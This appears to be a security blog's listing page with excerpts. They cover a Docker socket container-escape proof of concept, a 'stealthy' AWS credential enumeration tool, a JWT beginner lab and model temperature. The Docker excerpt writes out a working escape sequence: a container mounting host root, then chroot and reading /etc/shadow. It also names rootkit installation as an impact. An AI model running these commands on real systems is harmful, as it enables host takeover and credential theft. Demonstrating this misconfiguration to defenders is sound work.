Posts

🚨 A proof-of-concept showing how mounting /var/run/docker.sock into a container gives root access to the host. This project demonstrates a critical Docker misconfiguration. By mounting the Docker Unix socket into a container, the container can communicate with the host Docker daemon — and effectively escape its sandbox, escalate privileges, and fully control the host. ⚠️ TL;DR Mounting /var/run/docker.sock gives the container root-level access to the host. 📁 Project Structure docker-sock-breakout/ ├── Dockerfile ├── docker-compose.yml └── exploit.sh 🧪 How It Works A container is started with -v /var/run/docker.sock:/var/run/docker.sock Inside the container, Docker CLI is available We use Docker inside the container to run another container That second container mounts / from the host and runs chroot /host Now we’re inside the host, as root 🚀 Quick Start 1. Build and Run git clone https://github.com/CyberSquirrel-AI/docker-sock-breakout.git cd docker-sock-breakout docker compose up -d docker exec -it docker-sock-breakout sh 2. Inside the Container docker ps docker run -it --rm -v /:/host alpine 3. Inside the Alpine container chroot /host hostname id ls /root cat /etc/shadow 📉 Impact Full host filesystem access Run arbitrary containers as --privileged Read sensitive files like /etc/shadow, /root/.ssh/ Install rootkits or persist on host Pivot to other containers, networks, volumes 🛡️ Mitigation ❌ Do NOT mount /var/run/docker.sock into untrusted containers ⚠️ Disclaimer This project is for educational purposes only. Do not run this on any system you don’t own or have permission to test. You are responsible for your actions. ...

In the middle of a red team engagement or cloud pentest, you stumble upon AWS credentials. Maybe it’s in a .env file, maybe via EC2 metadata, or tucked inside a CI/CD pipeline. The next question is always: “What can these credentials actually access?” This is where AWS Access Auditor comes in — a lean, stealthy Python tool designed to enumerate accessible AWS services using a given Access Key and Secret Key, without making noise or risking detection. ...

Who this is for: Newcomers to cybersecurity who want a safe, hands-on way to understand JWTs. What you’ll build: A tiny Docker lab that shows JWT validation—so you can test valid vs invalid tokens. What you’ll learn How to recognize a JWT (including the quick “eyJ” tell) How to decode a JWT in your terminal (header & payload) The anatomy of a JWT: header, payload (claims), signature Common algorithms (HS256, RS256, ES256, EdDSA) Where JWTs show up in APIs (Bearer tokens, OIDC) Misconfigurations to look for + a safe Docker lab to try locally. Try-it-yourself: generate valid and intentionally invalid tokens to see the server’s responses 1) How to spot a JWT (fast) Shape: Three Base64URL-encoded chunks separated by dots: xxxxx.yyyyy.zzzzz // header.payload.signature The “eyJ” trick: Most JWT headers start with {" and Base64URL-encoding that begins with eyJ…. If you see a long string with two dots and it starts with eyJ, it’s likely a JWT (heuristic, not a guarantee). Where JWTs travel: Commonly in: HTTP headers → Authorization: Bearer <JWT> Cookies → a_cookie=... POST bodies → REST / GraphQL requests Quick helper: The online debugger at jwt.io can decode header/payload. Don’t paste secrets/production tokens. 2) Decode a JWT in your terminal (reading ≠ verifying) Decoding just reads JSON. It does not prove the token is valid or untampered. ...

Machine Learning (ML) models use a parameter called temperature to control the randomness or creativity of their output. Think of temperature as a “risk dial” — low values make the model play it safe, while high values let it take more chances in its word choices. 📊 Temperature vs. Output Behavior Temperature Range ML Model Output Characteristics 0.1 – 0.3 (Low) • ✅ More predictable and factual • ✅ Deterministic responses 0.7 (Medium) • ⚖️ Balanced creativity and reliability • 🗣️ Natural and varied responses without being too random 1.0 and above (High) • ⚠️ Possible hallucinations • 🎲 High randomness and creativity 🔎 Temperature Examples (Same Prompt, Different Temperatures) Prompt: What is Nmap? ...